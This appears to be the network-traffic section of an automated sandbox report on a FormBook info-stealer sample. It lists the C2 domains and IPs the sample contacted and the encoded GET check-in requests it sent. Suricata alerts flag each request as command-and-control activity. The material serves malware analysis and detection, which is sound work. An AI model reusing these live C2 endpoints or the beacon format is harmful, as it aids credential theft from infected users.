Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.educationacielouvert.com |
CNAME
educationacielouvert.com
|
84.32.84.32 |
| www.qysdh1.xyz | 35.244.161.158 | |
| www.hydrauliczny.online | 199.59.243.225 |
GET
200
http://www.qysdh1.xyz/o6g2/?w6A=XUg8FO+nVdlH42qXv6cQzVTq2CnZ0d6dCbTCSKxll3i1vjg3d0RwyGaC9/JEVpNUv7bz2nUz&-ZS=W6O83nah-
REQUEST
RESPONSE
BODY
GET /o6g2/?w6A=XUg8FO+nVdlH42qXv6cQzVTq2CnZ0d6dCbTCSKxll3i1vjg3d0RwyGaC9/JEVpNUv7bz2nUz&-ZS=W6O83nah- HTTP/1.1
Host: www.qysdh1.xyz
Connection: close
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Mon, 16 Oct 2023 01:58:33 GMT
Content-Type: text/html
Content-Length: 5208
Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
Vary: Accept-Encoding
ETag: "65267254-1458"
Cache-Control: no-cache
Accept-Ranges: bytes
Via: 1.1 google
Connection: close
GET
200
http://www.educationacielouvert.com/o6g2/?w6A=eeE/5eXEYnavNnNDmshcqn1xSUo8zOrK/Ya4aXTZXUIFTrCuM6Tmu8ev7YaAflYE+piVwyda&-ZS=W6O83nah-
REQUEST
RESPONSE
BODY
GET /o6g2/?w6A=eeE/5eXEYnavNnNDmshcqn1xSUo8zOrK/Ya4aXTZXUIFTrCuM6Tmu8ev7YaAflYE+piVwyda&-ZS=W6O83nah- HTTP/1.1
Host: www.educationacielouvert.com
Connection: close
HTTP/1.1 200 OK
Server: hcdn
Date: Mon, 16 Oct 2023 01:58:54 GMT
Content-Type: text/html
Content-Length: 10066
Connection: close
Vary: Accept-Encoding
x-hcdn-request-id: 99ccdb688e91217c88015f5a58091f39-srv-edge1
Expires: Mon, 16 Oct 2023 01:58:53 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
GET
200
http://www.hydrauliczny.online/o6g2/?w6A=8NW9x49tJV1H9qvd2CBk+oBG7l2hdO9qMKvqNWWs9eYHU8Mmj6uZZUB5FkBqZUv7ofCiF+Pz&-ZS=W6O83nah-
REQUEST
RESPONSE
BODY
GET /o6g2/?w6A=8NW9x49tJV1H9qvd2CBk+oBG7l2hdO9qMKvqNWWs9eYHU8Mmj6uZZUB5FkBqZUv7ofCiF+Pz&-ZS=W6O83nah- HTTP/1.1
Host: www.hydrauliczny.online
Connection: close
HTTP/1.1 200 OK
date: Mon, 16 Oct 2023 01:59:14 GMT
content-type: text/html; charset=utf-8
content-length: 1309
x-request-id: 60239d30-e391-4084-8421-d1795b77d46e
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wcEOPZR0vAZ7I/e8aYQO9gJsE6UfhhOH6PK0FTHikBg+gDfi0NKHX7ox3pBes9phoAyJmPA/ManN0TJQQwiz1g==
set-cookie: parking_session=60239d30-e391-4084-8421-d1795b77d46e; expires=Mon, 16 Oct 2023 02:14:14 GMT; path=/
connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49166 -> 84.32.84.32:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49167 -> 199.59.243.225:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49165 -> 35.244.161.158:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49165 -> 35.244.161.158:80 | 2031088 | ET HUNTING Request to .XYZ Domain with Minimal Headers | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts